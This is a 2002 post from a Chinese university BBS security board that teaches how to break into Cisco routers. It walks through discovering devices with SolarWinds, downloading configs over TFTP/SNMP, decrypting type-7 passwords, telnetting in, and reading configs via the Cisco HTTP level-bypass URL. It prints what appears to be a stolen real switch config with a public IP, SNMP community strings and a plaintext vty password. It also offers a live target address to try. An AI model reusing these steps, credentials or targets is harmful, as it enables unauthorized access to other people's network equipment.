● 入侵CISCO/萤城客/2002.4 - 荔园在线 | 深圳大学学生论坛,荔园晨风BBS,深大在线网站

荔园之美，在春之萌芽，在夏之绽放，在秋之收获，在冬之沉淀

发信人: ethanwy (朽木儿), 信区: Security
标  题: 入侵CISCO/萤城客/2002.4
发信站: 荔园晨风BBS站 (Fri Apr  5 22:20:49 2002), 转信

　　(我搞了半天也没把图片显示出来，大家可以直接访问http://cif.y365.com/cisco
.htm)
一：可以对园区网设备施加的具体威胁，也可以理解为攻击思路，目标或手段
1：访问设备的控制端口和TELNET端口
2：访问路由器配置文件和了解口令
3：通过SNMP访问设备的配置文件并了解内部网络的拓扑结构
4：通过截获路漏更新信息了解内部网络的拓扑结构
5：通过虚假的路又更新信息误导数据流的转发
6：访问敏感的内部网络
7：获得对路由器的HTTP访问
8：对或通过以太网交换机的非授权访问
二：几个基本知识
1：telnet是一种强有力的服务，它能为用户提供很多internet设施和服务的唯一访问手
段，允许用户以明文方式远程访问一个命令界面，由简单的用户名/口令认证机制所控制
，很容易被欺骗。telnet端口在路由器上被称为虚拟终端（vty）端口；
2：tftp不是一种安全的协议，因为它没有任何认证机制，也就是说不需要口令，入侵者
可以很容易地用tftp请求文件传输，其可以用于得到路由配置文件并修改之；
3：SNMP是一个应用层协议，它在SNMP管理器和代理之间提供了一个通信管道，SNMP有多
种访问级别：RO（只读），RW（读/写），W（允许对代理进行写操作）。SNMP团体字符
对MIB对象的访问进行认证，并作为嵌入的口令；
4：CISCO口令分为用户访问口令和特权级口令（enable）。缺省情况下，路由器上所有
控制台口令是以明文形式存储在路由器配置中。有两种用于隐藏明文形式的口令：（一
般地）"Service password_encryption"命令用于加密用户访问口令，"enable secret"
命令用于加密特权级口令，"Service password_encryption"命令所用的加密算法是一种
不太复杂的可逆的基于Vigener密码的CISCO专有算法，安全级别低，有大量破解器能反
解CISCO口令；而"enable secret"则用到了一个基于MD5散列函数的单向加密算法，安全
级别较高，目前尚无良好解决方法，但其仍然可能会受到强力破解或口令字典的攻击。

三：利用solarwinds2001得到CISCO密码
1：solarwinds2001是个集多种功能于一身的cisco管理工具，界面友好；
2：下载地址（52M左右）
http://solarwinds.net/Download-Tools.htm
http://download.online.tj.cn/software/internet/netassistant/15411.html
http://peckerland.com/library/solarwinds2001.zip
3：工具条如图一所示，酷似QQ，清晰明了！
图一
[img]http://cif.y365.com/cisco/1.bmp[/img]
4：打开Cisco Tools/IP Network Browser，界面如图二，简单设置如图三；
图二
[img]http://cif.y365.com/cisco/2.bmp[/img]
图三
[img]http://cif.y365.com/cisco/3.bmp[/img]
5：发现CISCO路由器图四
图四
[img]http://cif.y365.com/cisco/4.bmp[/img]
6：还可以用Cisco Tools/Download Config来下载（图五）
图五
[img]http://cif.y365.com/cisco/5.bmp[/img]
7：TFTP Server自动启动（图六）
图六
[img]http://cif.y365.com/cisco/6.bmp[/img]
8：利用Cisco Tools/Config Editor&viewer打开下载的config文件，如下是我下载的一
份配置文件：
!
version 11.2
no service pad
no service udp-small-servers
no service tcp-small-servers
!
hostname HGHLNDSWSTWD.07.IDF1A.DSW08
!
enable secret 5 $1$ukn/$LU0yrd7/YBqBNJRDlIVes.--->>>>MD5加密
!
!
ip subnet-zero
!
!
interface VLAN1
ip address 209.11.111.8 255.255.255.192
no ip route-cache
!
interface FastEthernet0/1
description Port connected to Apt# 7307
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/2
description Port connected to Apt# 7308
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/3
description Port connected to Apt# 7309
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/4
description Port connected to Apt# 7310
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/5
description Port connected to Apt# 7311
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/6
description Port connected to Apt# 7337
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/7
description Port connected to Apt# 7338
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/8
description Port connected to Apt# 7339
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/9
description Port connected to Apt# 7340
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/10
description Port connected to Apt# 7341
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/11
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/12
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/13
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/14
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/15
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/16
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/17
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/18
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/19
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/20
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/21
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/22
description Port connected to Apt#
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/23
description Port connected to Fiber Link
!
interface FastEthernet0/24
description Port connected to Fiber Link
!
ip default-gateway 209.11.111.1
mac-address-table secure 0001.0235.5a4e FastEthernet0/2 vlan 1
snmp-server community N3tw0rk RO
snmp-server community private RW
snmp-server community public RO
snmp-server chassis-id 0x0F
!
line con 0
stopbits 1
line vty 0 4
password MDU!Admin -->>>>明文口令，未作加密处理！！
login
line vty 5 9
password MDU!Admin
login
!
end
9：如果配置文件中口令经"Service password_encryption"命令加密，比如说出现“pa
ssword 7 15110E1E2A2F3F”类的，用Cisco Tools/Router Password de..解密，如图七
：
图七
[img]http://cif.y365.com/cisco/7.bmp[/img]
10：现在你就可以telnet *.*.*.* 进入了！
11：常见问题：
（1）为什么老是下载不了config?
答：正常！有几个原因，无法辨别读取，路由器拒绝，TFTP server未设置添加允许传输
IP段...要有点耐心，现在存在此漏洞的很多！
（2）MD5加密的特权级口令怎么破解？
答：很难，但可以拿John跑跑。不妨拿用户级访问口令一试，有些路由的两个口令一样
！
（3）为什么我拿到了密码却telnet不上？
答：telnet不上是因为其限制特定IP地址的访问或其只允许特定IP地址访问。
（4）solarwinds太大，有没有其他方法进入路由器？
答：有，用2M多一点的languard network scanner2.0（www.sandflee.net有下载），其
可以正确判断操作系统，但破解几率大降，需要对方CISCO同时开23，80两端口（一般C
ISCO不开80端口），发现后用http://*.*.*.*/level/XX/exec/show%20config直接读出
config（这点很方便），其中XX表示16-99中的一位数！送大家一个感受感受 http://6
6.33.80.99/level/19/exec/show%20config
四：由于时间篇幅所限，本文暂告一段落。本篇笔者只是笼统地谈了一下如何得到CISC
O
密码，但我会继续推出CISCO系列教程，下两篇计划详细地讲解CISCO IOS 命令操作和
CISCO内部安全配置，这样新手们就不会因没有钥匙打不开用不了属于自己的一箱黄金了

而苦恼了！本文欢迎转载，但请务必保持全文完整。最后，向大家介绍一个人气旺学习

氛围好的地方---www.sandflee.net及其论坛！！
五：警告，请清醒地估量你的行为可能带来的后果！
--

       \_\/                       .-==/~\
      ___/_,__,_ __ ____ ____ __)/   /{~}}
      ---,---,------------------,\'-' {{~}
                                  '-==\}/

※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.33.42]

荔园在线首页友情链接：深圳大学深大招生荔园晨风BBS S-Term软件网络书店